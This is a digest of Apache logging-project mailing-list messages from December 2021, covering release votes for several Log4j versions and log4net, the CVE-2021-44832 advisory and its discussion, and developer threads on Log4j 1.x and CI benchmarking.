Re: [VOTE] Release Apache Log4j Scala API version 13.0-rc1

Shall we cancel this, upgrade to 2.17.1, and revote? On Thu, Dec 23, 2021 at 10:45 PM Matt Sicker wrote: > This is a vote to release Log4j Scala API 13.0. This release primarily > adds support for Scala 3. > > Please download, test, and cast your votes on the log4j developers list. > [] +1, rele

Re: [VOTE] Release Log4j Kotlin API 1.2.0-rc3

Shall we cancel this, upgrade to 2.17.1, and revote? On Tue, Dec 21, 2021 at 5:02 AM Matt Sicker wrote: > This is a vote to release Log4j Kotlin API version 1.2.0, the next version > of the Kotlin facade for Log4j2. > > Please download, test, and cast your votes on the log4j developers list. > [

Re: [VOTE] Release Log4j 2.3.2 for Java 6

+1 commits OK sigs OK hashes OK `./mvnw clean verify apache-rat:check *-pl \!:log4j-perf*` OK on $ java -version openjdk version "1.8.0_312" OpenJDK Runtime Environment (Zulu 8.58.0.13-CA-linux64) (build 1.8.0_312-b07) OpenJDK 64-Bit Server VM (Zulu 8.58.0.13-CA-linux64) (build 25.312-b07, mixed

Re: [VOTE] Release Log4j 2.12.4-rc1 for Java 7

+1 commits OK sigs OK hashes OK `./mvnw clean verify apache-rat:check` OK on $ java -version openjdk version "1.8.0_312" OpenJDK Runtime Environment (Zulu 8.58.0.13-CA-linux64) (build 1.8.0_312-b07) OpenJDK 64-Bit Server VM (Zulu 8.58.0.13-CA-linux64) (build 25.312-b07, mixed mode) $ uname -a Li

Re: [VOTE] Release Log4j 2.3.2 for Java 6

+1 Hashes and signatures OK, build OK: Apache Maven 3.6.2 (40f52333136460af0dc0d7232c0dc0bcf0d9e117; 2019-08-28T00:06:16+09:00) Maven home: C:\apps\apache-maven-3.6.2\bin\.. Java version: 1.8.0_202, vendor: Oracle Corporation, runtime: C:\apps\jdk1.8.0_202\jre Default locale: en_GB, platform enco

Re: [DISCUSS] The future of Log4j 1.x

Agreed with all points of Carter. It is either 1 or 4. Anything more than 4 (including 5) is a hard no from me. On Fri, Dec 24, 2021 at 6:00 PM Carter Kozak wrote: > I would agree directionally with option 1 or option 4. > > Making changes without pushing binary artifacts to maven central (opti

Re: [VOTE] Release Log4j 2.12.4-rc1 for Java 7

+1 signatures and hashes OK build tag log4j-2.12.4-rc1 OK Apache Maven 3.6.2 (40f52333136460af0dc0d7232c0dc0bcf0d9e117; 2019-08-28T00:06:16+09:00) Maven home: C:\apps\apache-maven-3.6.2\bin\.. Java version: 1.8.0_202, vendor: Oracle Corporation, runtime: C:\apps\jdk1.8.0_202\jre Default locale:

Re: [VOTE] Release log4net 2.0.14

Thanks Matt, then I'd consider this vote closed and the release ready to go as soon as I get to it (probably the end of the week). Thanks to everyone who double-checked me. -d On December 29, 2021 02:23:16 Matt Sicker wrote: Yeah, you can close the vote before releasing. -- Matt Sicker O

Re: [VOTE] Release Log4j 2.3.2 for Java 6

+1 Verified Signatures, hashes and ran the build on my Mac. Ralph > On Dec 28, 2021, at 6:59 PM, Matt Sicker wrote: > > This is a vote to release Log4j 2.3.2, a security release for Java 6 users. > > Please download, test, and cast your votes on the log4j developers list. > [] +1, release th

Re: [VOTE] Release Apache Log4j Scala API version 13.0-rc1

Good catch! Added sig files for those two. -- Matt Sicker > On Dec 28, 2021, at 21:22, Gary Gregory wrote: > > Hi Matt, > > dist.a.o is missing ASC files for: > - apache-log4j-api-scala-13.0-bin.zip > - apache-log4j-api-scala-13.0-bin.tar.gz > > Gary > > > On Thu, Dec 23, 2021 at 4:45 PM Mat

Re: [VOTE] Release Apache Log4j Scala API version 13.0-rc1

Hi Matt, dist.a.o is missing ASC files for: - apache-log4j-api-scala-13.0-bin.zip - apache-log4j-api-scala-13.0-bin.tar.gz Gary On Thu, Dec 23, 2021 at 4:45 PM Matt Sicker wrote: > This is a vote to release Log4j Scala API 13.0. This release primarily > adds support for Scala 3. > > Please do

Re: [VOTE] Release Log4j 2.3.2 for Java 6

+1 ASC files from dist.a.o OK sha512 files from dist.a.o OK RAT check OK 'mvn clean install' OK 'mvn site -DskipTests' fails with ERROR [org.apache.fop.fo.FONode:85] 2021-12-28 21:56:54,956 - I/O error while loading image: null ERROR [org.apache.fop.fo.FONode:85] 2021-12-28 21:56:55,015 - I/O erro

Re: [VOTE] Release Log4j 2.12.4-rc1 for Java 7

Note that the part about skipping the Cassandra module is to work out an odd failure that seems to happen only on my Mac Mini and maybe also on M1 macs (not sure about that last one) Gary On Tue, Dec 28, 2021 at 9:43 PM Ron Grabowski wrote: > +1 > > "mvn clean install -pl '!log4j-cassandra'" ra

Re: [VOTE] Release Log4j 2.12.4-rc1 for Java 7

+1 "mvn clean install -pl '!log4j-cassandra'" ran correctly. Verified hashes and asc files. RAT passed too. On 12/28/2021 7:46 PM, Gary Gregory wrote: +1 SHA512 OK ASC OK RAT check OK mvn clean install -pl '!log4j-cassandra' OK openjdk version "1.8.0_312" OpenJDK Runtime Environment (build

Re: [VOTE] Release Log4j Kotlin API 1.2.0-rc3

Gentle reminder. -- Matt Sicker > On Dec 21, 2021, at 15:21, Gary Gregory wrote: > > Is it possible that RAT is only configured for reporting and not invocation > from a build? The log4j RAT passes. > > Gary > > > > On Tue, Dec 21, 2021, 16:12 Matt Sicker > wrote: >

Re: [VOTE] Release Apache Log4j Scala API version 13.0-rc1

Gentle reminder. -- Matt Sicker > On Dec 23, 2021, at 15:44, Matt Sicker wrote: > > This is a vote to release Log4j Scala API 13.0. This release primarily adds > support for Scala 3. > > Please download, test, and cast your votes on the log4j developers list. > [] +1, release the artifacts > [

[VOTE] Release Log4j 2.3.2 for Java 6

This is a vote to release Log4j 2.3.2, a security release for Java 6 users. Please download, test, and cast your votes on the log4j developers list. [] +1, release the artifacts [] -1, don't release because… The vote will remain open for as short amount as time as required to vet the release. Al

Re: [VOTE] Release Log4j 2.12.4-rc1 for Java 7

+1 SHA512 OK ASC OK RAT check OK mvn clean install -pl '!log4j-cassandra' OK openjdk version "1.8.0_312" OpenJDK Runtime Environment (build 1.8.0_312-bre_2021_10_20_23_15-b00) OpenJDK 64-Bit Server VM (build 25.312-b00, mixed mode) Apache Maven 3.8.4 (9b656c72d54e5bacbed989b64718c159fe39b537) Ma

Re: [VOTE] Release Log4j 2.12.4-rc1 for Java 7

The good thing is that the ASC files are in the proper format to verify with 'gpg --verify' :-) The bad thing is that 'shasum --check' does not understand our sha512 or sha256 files :-( Gary On Tue, Dec 28, 2021 at 7:22 PM Gary Gregory wrote: > I think it is more interesting to download the dis

Re: [VOTE] Release log4net 2.0.14

Yeah, you can close the vote before releasing. -- Matt Sicker > On Dec 28, 2021, at 16:11, Davyd McColl wrote: > > Hi Matt, I'm happy to, just need to get the time to do the actually release > (: holiday mode has kicked in good and proper. Can I close out before I > release? > > -d > > > On

Re: [VOTE] Release Log4j 2.12.4-rc1 for Java 7

I think it is more interesting to download the dist archive instead of the Maven repo because each PMC member is supposed to validate sigs, so: wget -e robots=off --cut-dirs=7 -nH -r -p -np --no-check-certificate https://dist.apache.org/repos/dist/dev/logging/log4j/ ATM you get more than you need

Re: Issue with white spaces and log4j2 configuration loaded from resource jar

A legal URI cannot contain a space (per the RFC), you'll have to escape it to %20. Gary On Tue, Dec 28, 2021 at 3:29 PM Leon Finker wrote: > Hi, > > In one of our applications we're hitting the following issue in the > latest log4j2 versions. We specify a config file, and it's found and > loade

[VOTE] Release Log4j 2.12.4-rc1 for Java 7

This is a vote to release Log4j 2.12.4, a security release for Java 7 users. Please download, test, and cast your votes on the log4j developers list. [] +1, release the artifacts [] -1, don't release because… The vote will remain open for as short amount as time as required to vet the release. A

Re: CVE-2021-44832: Apache Log4j2 vulnerable to RCE via JDBC Appender when attacker controls configuration

Xeno, We take security issues very seriously. It is ASF policy that no one should publicly discuss security issues before a patch is available. In this case that policy was not followed by someone outside of the ASF who should know better. Most people will read this CVE and conclude it is not

Re: [log4cxx] CI Benchmarking

It occurs to me that a better approach might be to run two benchmark versions in the same job and compare the results. A 'good' reference version artifact could be downloaded and compared with the new version.

Re: [VOTE] Release log4net 2.0.14

Hi Matt, I'm happy to, just need to get the time to do the actually release (: holiday mode has kicked in good and proper. Can I close out before I release? -d On December 28, 2021 21:37:21 Matt Sicker wrote: Seems like we have enough votes to complete this release. Davyd, would you like t

Re: CVE-2021-44832: Apache Log4j2 vulnerable to RCE via JDBC Appender when attacker controls configuration

sigh.. so 2.17.1 IS a security fix now？ XenoAmess From: Matt Sicker Sent: Wednesday, December 29, 2021 4:07:48 AM To: dev@logging.apache.org Subject: Re: CVE-2021-44832: Apache Log4j2 vulnerable to RCE via JDBC Appender when attacker controls configuration Ther

Re: Issue with white spaces and log4j2 configuration loaded from resource jar

Hi Ralph, Upon further investigation the application is setting a URLClassLoader. Not using standard class loader that is normally used. I have to try and reproduce it. This happens only in this setup. Maybe the best thing is to just not rely on finding log4j config from jar any more and use absol

Re: Issue with white spaces and log4j2 configuration loaded from resource jar

Yes. It would be best if you could provide a sample that fails. I am assuming from your message that this happens on windows. Ralph > On Dec 28, 2021, at 1:29 PM, Leon Finker wrote: > > Hi, > > In one of our applications we're hitting the following issue in the > latest log4j2 versions. We sp

Issue with white spaces and log4j2 configuration loaded from resource jar

Hi, In one of our applications we're hitting the following issue in the latest log4j2 versions. We specify a config file, and it's found and loaded from the class loader by log4j2. Unfortunately, it seems like there was a breaking change some time ago. It can no longer handle white spaces in the U

Re: CVE-2021-44832: Apache Log4j2 vulnerable to RCE via JDBC Appender when attacker controls configuration

There’s no specific commit yet, just branches. The commits are coming over the next few hours as we cut the release candidates. -- Matt Sicker > On Dec 28, 2021, at 14:06, Jason Pyeron wrote: > >> -Original Message- >> From: Gary Gregory >> Sent: Tuesday, December 28, 2021 3:02 PM >> >

RE: CVE-2021-44832: Apache Log4j2 vulnerable to RCE via JDBC Appender when attacker controls configuration

> -Original Message- > From: Gary Gregory > Sent: Tuesday, December 28, 2021 3:02 PM > > > 2.12.4 and 2.3.2 are brewing. I see, are they in git? If so, what commit? -Jason

Re: CVE-2021-44832: Apache Log4j2 vulnerable to RCE via JDBC Appender when attacker controls configuration

Those releases are still being created right now. We’ll have release candidates and subsequent releases for 2.12.x and 2.3.x over the next day or two. -- Matt Sicker > On Dec 28, 2021, at 14:03, Jason Pyeron wrote: > >> >> The tag is rel/2.17.1 as usual. Download page is linked in the linked

RE: CVE-2021-44832: Apache Log4j2 vulnerable to RCE via JDBC Appender when attacker controls configuration

> > The tag is rel/2.17.1 as usual. Download page is linked in the linked > announcement email > of the release. > >> Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix > >> releases 2.3.2 > and > >> 2.12.4) are vulnerable to a remote code execution (RCE) attack where an

Re: CVE-2021-44832: Apache Log4j2 vulnerable to RCE via JDBC Appender when attacker controls configuration

On Tue, Dec 28, 2021 at 2:59 PM Jason Pyeron wrote: > > -Original Message- > > From: Matt Sicker [mailto:mattsic...@apache.org] > > Sent: Tuesday, December 28, 2021 2:27 PM > > To: annou...@apache.org; dev@logging.apache.org > > Subject: CVE-2021-44832: Apache Log4j2 vulnerable to RCE via

Re: CVE-2021-44832: Apache Log4j2 vulnerable to RCE via JDBC Appender when attacker controls configuration

The tag is rel/2.17.1 as usual. Download page is linked in the linked announcement email of the release. -- Matt Sicker > On Dec 28, 2021, at 13:58, Jason Pyeron wrote: > >> -Original Message- >> From: Matt Sicker [mailto:mattsic...@apache.org] >> Sent: Tuesday, December 28, 2021 2:27 P

RE: CVE-2021-44832: Apache Log4j2 vulnerable to RCE via JDBC Appender when attacker controls configuration

> -Original Message- > From: Matt Sicker [mailto:mattsic...@apache.org] > Sent: Tuesday, December 28, 2021 2:27 PM > To: annou...@apache.org; dev@logging.apache.org > Subject: CVE-2021-44832: Apache Log4j2 vulnerable to RCE via JDBC Appender > when attacker > controls configuration > > S

Re: [log4cxx] CI Benchmarking

I think the action approach is sufficient for now. If we can get a dedicated GHA runner or similar, we can eventually move the benchmarks to a dedicated machine and still use the same API. -- Matt Sicker > On Dec 28, 2021, at 13:39, Robert Middleton wrote: > > I think adding it to github actio

Re: [log4cxx] CI Benchmarking

I think adding it to github actions(while certainly not ideal) is at least a step in the right direction. If/when we have dedicated hardware to test it properly, we can then migrate it over. At least having it setup to start with should make migration easier, plus even if it's not super consisten

Re: [DISCUSS] The future of Log4j 1.x

Before any Pull Requests are reviewed this discussion needs to come to a conclusion. So far I have seen some people in favor of option 1, none in favor of option 2, none in favor of option 3, some in favor of option 1 or option 4, no one in favor of option 5 (with several -1s) and Vladimir wh

Re: [VOTE] Release log4net 2.0.14

Seems like we have enough votes to complete this release. Davyd, would you like to close the vote? -- Matt Sicker > On Dec 25, 2021, at 14:50, Remko Popma wrote: > > +1 > > On Sat, Dec 25, 2021 at 6:35 AM Ralph Goers > wrote: > >> +1 >> >> I checked the signature and hashes and those look g

CVE-2021-44832: Apache Log4j2 vulnerable to RCE via JDBC Appender when attacker controls configuration

Severity: moderate Description: Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix releases 2.3.2 and 2.12.4) are vulnerable to a remote code execution (RCE) attack where an attacker with permission to modify the logging configuration file can construct a malicious configu

Re: Log4J 1.x progress, pull request(s), plans

The main point is, I thought, we agreed to not say/do anything until we have a PLAN. See also Ralph's request to call for a VOTE or wrap up the email with the list of options. Gary On Tue, Dec 28, 2021 at 2:08 PM Matt Sicker wrote: > I looked through most of the PR (besides the pom changes). Se

[ANNOUNCE] Apache Log4j 2.17.1 released

The Apache Log4j 2 team is pleased to announce the Log4j 2.17.1 release! Apache Log4j is a well known framework for logging application behavior. Log4j 2 is an upgrade to Log4j that provides significant improvements over its predecessor, Log4j 1.x, and provides many other modern features such as s

Re: Log4J 1.x progress, pull request(s), plans

I looked through most of the PR (besides the pom changes). Seems good so far, but I’d like someone else to also verify. -- Matt Sicker > On Dec 28, 2021, at 12:36, Vladimir Sitnikov > wrote: > > Leo, All, > > I've reviewed Leo's changes and filed a PR > https://github.com/apache/logging-log4j

Re: Log4J 1.x progress, pull request(s), plans

Leo, All, I've reviewed Leo's changes and filed a PR https://github.com/apache/logging-log4j1/pull/18 CI: https://github.com/vlsi/log4j/runs/4652588702 I think it is worth separating "build script refactoring" from "bugfix" changes. Does anybody have cycles to review and merge "build script refa

[VOTE][RESULT] Release Apache Log4j 2.17.1-rc1

With my +1, the vote passes with 7 +1 votes from myself, Carter, Ron, Gary, Ralph, Remko, and Volkan. I’ll continue with the release. -- Matt Sicker > On Dec 28, 2021, at 06:23, Volkan Yazıcı wrote: > > +1 > > `./mvnw clean verify` passes on > > $ uname -a > Linux tahta 5.11.0-43-generic #47~

[GitHub] [logging-log4j1] vlsi opened a new pull request #18: Refine build scripts

vlsi opened a new pull request #18: URL: https://github.com/apache/logging-log4j1/pull/18 This PR configures build and test scripts, so the project is buildable and testable with the current Maven and Java versions. Note: this change does not alter the features, so I suggest merging

Re: [log4cxx] CI Benchmarking

Agreed with your remarks regarding the unreliability of benchmark results in the cloud. See my proposal in private@ to get some machines for continuous benchmarks. On Tue, Dec 28, 2021 at 10:17 AM Dominik Psenner wrote: > Hi Stephen, > > The trouble with benchmarks in CI is that the numbers may

Re: [VOTE] Release Apache Log4j 2.17.1-rc1

+1 `./mvnw clean verify` passes on $ uname -a Linux tahta 5.11.0-43-generic #47~20.04.2-Ubuntu SMP Mon Dec 13 11:06:56 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux $ java -version openjdk version "1.8.0_312" OpenJDK Runtime Environment (Zulu 8.58.0.13-CA-linux64) (build 1.8.0_312-b07) OpenJDK 64-Bit

Re: [VOTE] Release Apache Log4j 2.17.1-rc1

+1 signatures and hashes ok build ok Apache Maven 3.6.2 (40f52333136460af0dc0d7232c0dc0bcf0d9e117; 2019-08-28T00:06:16+09:00) Maven home: C:\apps\apache-maven-3.6.2\bin\.. Java version: 1.8.0_202, vendor: Oracle Corporation, runtime: C:\apps\jdk1.8.0_202\jre Default locale: en_GB, platform encodin

Re: [Chainsaw] Removal of Log4j1

+1 for implementation-agnostic custom DTO tailored for Chainsaw. On Mon, Dec 27, 2021 at 9:31 PM Matt Sicker wrote: > I agree on the generic approach. While there’s a LogEvent interface in > log4j2, it would probably make sense for Chainsaw to define its own DTOs > and such. > -- > Matt Sicker >

Re: [log4cxx] CI Benchmarking

Yes... Benchmark is only meaningful when on same machine, and totally same situation. Benchmark on the cloud seems weird and pointless... Besides, they are time-costing, thus will make our ci worse. Dominik Psenner 于2021年12月28日周二 17:17写道： > Hi Stephen, > > The trouble with benchmarks in CI is t

Re: [log4cxx] CI Benchmarking

Hi Stephen, The trouble with benchmarks in CI is that the numbers may be largely unreliable, depending mostly on the hardware where it runs and in general the surrounding environment. Chances are high that the benchmarks will not produce comparable results. It would however be good to provide som

Master branch

I have “fixed” the master branch build. Most of the components that were generating test jars have been split into two modules - the main component, which only builds the jar, and a -test component that builds a -test jar and then runs the unit tests. But there are still quirks: 1. log4j-core